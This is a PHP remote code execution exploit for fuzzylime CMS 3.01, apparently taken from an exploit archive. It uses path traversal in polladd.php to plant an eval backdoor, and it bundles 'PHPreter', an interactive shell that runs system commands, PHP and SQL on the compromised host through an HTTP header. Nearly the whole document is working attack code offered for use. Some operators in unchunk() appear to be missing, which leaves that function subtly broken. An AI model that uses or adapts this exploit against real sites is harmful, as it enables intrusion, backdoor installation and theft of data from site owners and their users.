fuzzylime cms 3.01 (polladd.php poll) Remote Code Execution Exploit (php)

#!/usr/bin/php
<?php
##
## Fuzzylime 3.01 Remote Code Execution
## Credits: Inphex and real
##
## [C:\]# php fuzzylime.php http://www.target.com/fuzzylime/
## [target][cmd]# id
## uid=63676(dswrealty) gid=888(vusers) groups=33(www-data)
##

$url = $argv[1];

get($url.'code/polladd.php?poll=....//titles&log=1&_SERVER[REMOTE_ADDR]=' . urlencode('";print "-:-:-";eval(stripslashes($_SERVER[\'HTTP_SHELL\']));print "-:-:-"; ?>') );

$shell = new phpreter($url.'code/polls/titles.inc.php', '-:-:-(.*)-:-:-', 'cmd', array(), false);

function get($url)
{
$infos = parse_url($url);
$host = $infos['host'];
$port = isset($infos['port']) ? $infos['port'] : 80;

$fp = fsockopen($host, $port, &$errno, &$errstr, 30);

$req = "GET $url HTTP/1.1\r\n";
$req .= "Host: $host\r\n";
$req .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14\r\n";
$req .= "Connection: close\r\n\r\n";

fputs($fp,$req);
fclose($fp);
}

/*
* Copyright (c) real
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; either version 2
* of the License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
*
* TITLE: PHPreter
* AUTHOR: Charles "real" F. <charlesfol[at]hotmail.fr>
* VERSION: 1.0
* LICENSE: GNU General Public License
*
* This is a really simple class with permits to exec SQL, PHP or CMD
* on a remote host using the HTTP "Shell" header.
*
*
* Sample code:
* [host][sql]# mode=cmd
* [host][cmd]# id
* uid=2176(u47170584) gid=600(ftpusers)
*
* [host][cmd]# mode=php
* [host][php]# echo phpversion();
* 4.4.8
* [host][php]# mode=sql
* [host][sql]# SELECT version(), user()
* --------------------------------------------------
* version() | 5.0.51a-log
* user() | [email protected]
* --------------------------------------------------
*
* [host][sql]#
*
*/

class phpreter
{
var $url;
var $host;
var $port;
var $page;

var $mode;

var $ssql;

var $prompt;
var $phost;

var $regex;
var $data;

/**
* __construct()
*
* @param url The url of the remote shell.
* @param regexp The regex to catch cmd result.
* @param mode Mode: php, sql or cmd.
* @param sql An array with the file to include,
* and sql vars
* @param clear Determines if clear() is called
* on startup
*/
function __construct($url, $regexp='^(.*)$', $mode='cmd', $sql=array(), $clear=true)
{
$this->url = $url;

$this->regex = '#'.$regexp.'#is';

#
# Set data
#

$infos = parse_url($this->url);
$this->host = $infos['host'];
$this->port = isset($infos['port']) ? $infos['port'] : 80;
$this->page = $infos['path'];
unset($infos);

# www.(site).com
$host_tmp = explode('.',$this->host);
$this->phost = $host_tmp[ count($host_tmp)-2 ];
unset($host_tmp);

#
# Set up MySQL connection string
#
if(!sizeof($sql))
$this->ssql = '';
elseif(sizeof($sql)==5)
{
$this->ssql = "include('$sql[0]');"
. "mysql_connect($sql[1], $sql[2], $sql[3]);"
. "mysql_select_db($sql[4]);";
}
else
{
$this->ssql = ""
. "mysql_connect('$sql[0]', '$sql[1]', '$sql[2]');"
. "mysql_select_db('$sql[3]');";
}

$this->setmode($mode);

#
# Main Loop
#

if($clear) $this->clear();
print $this->prompt;

while( !preg_match('#^(quit|exit|close)$#i', ($cmd = trim(fgets(STDIN)))) )
{
# change mode
if(preg_match('#^(set )?mode(=| )(sql|cmd|php)$#i',$cmd,$array))
$this->setmode($array[3]);

# clear data
elseif(preg_match('#^clear$#i',$cmd))
$this->clear();

# else
else print $this->exec($cmd);

print $this->prompt;
}
}

/**
* clear()
* Just clears ouput, printing '\n'x50
*/
function clear()
{
print str_repeat("\n", 50);
return 0;
}

/**
* setmode()
* Set mode (PHP, CMD, SQL)
* You don't have to call it.
* use mode=[php|cmd|sql] instead,
* in the prompt.
*/
function setmode($newmode)
{
$this->mode = strtolower($newmode);
$this->prompt = '['.$this->phost.']['.$this->mode.']# ';

switch($this->mode)
{
case 'cmd':
$this->data = 'system(\'<CMD>\');';
break;
case 'php':
$this->data = '';
break;
case 'sql':
$this->data = $this->ssql
. '$q = mysql_query(\'<CMD>\') or print(str_repeat("-",50)."\n".mysql_error()."\n");'
. 'print str_repeat("-",50)."\n";'
. 'while($r=mysql_fetch_array($q,MYSQL_ASSOC))'
. '{'
. 'foreach($r as $k=>$v) print " ".$k.str_repeat(" ", (20-strlen($k)))."| $v\n";'
. 'print str_repeat("-",50)."\n";'
. '}';
break;
}
return $this->mode;
}

/**
* exec()
* Execute any query and catch the result.
* You don't have to call it.
*/
function exec($cmd)
{
if(!strlen($this->data)) $shell = $cmd;
else $shell = str_replace('<CMD>', addslashes($cmd), $this->data);

$fp = fsockopen($this->host, $this->port, &$errno, &$errstr, 30);

$req = "GET " . $this->page . " HTTP/1.1\r\n";
$req .= "Host: " . $this->host . ( $this->port!=80 ? ':'.$this->port : '' ) . "\r\n";
$req .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14\r\n";
$req .= "Shell: $shell\r\n";
$req .= "Connection: close\r\n\r\n";

unset($shell);

fputs($fp, $req);

$content = '';
while(!feof($fp)) $content .= fgets($fp, 128);

fclose($fp);

# Remove headers
$data = explode("\r\n\r\n", $content);
$headers = array_shift($data);
$content = implode("\r\n\r\n", $data);

if(preg_match("#Transfer-Encoding:.*chunked#i", $headers))
$content = $this->unchunk($content);

preg_match($this->regex, $content, $data);

if($data[1][ strlen($data)-1 ] != "\n") $data[1] .= "\n";

return $data[1];
}

/**
* unchunk()
* This function aims to remove chunked content sizes which
* are putted by apache server when it uses chunked
* transfert-encoding.
*/
function unchunk($data)
{
$dsize = 1;
$offset = 0;

while($dsize>0)
{
$hsize_size = strpos($data, "\r\n", $offset) - $offset;

$dsize = hexdec(substr($data, $offset, $hsize_size));

# Remove $hsize\r\n from $data
$data = substr($data, 0, $offset) . substr($data, ($offset $hsize_size 2) );

$offset = $dsize;

# Remove the \r\n before the next $hsize
$data = substr($data, 0, $offset) . substr($data, ($offset 2) );
}

return $data;
}
}

?>

相关推荐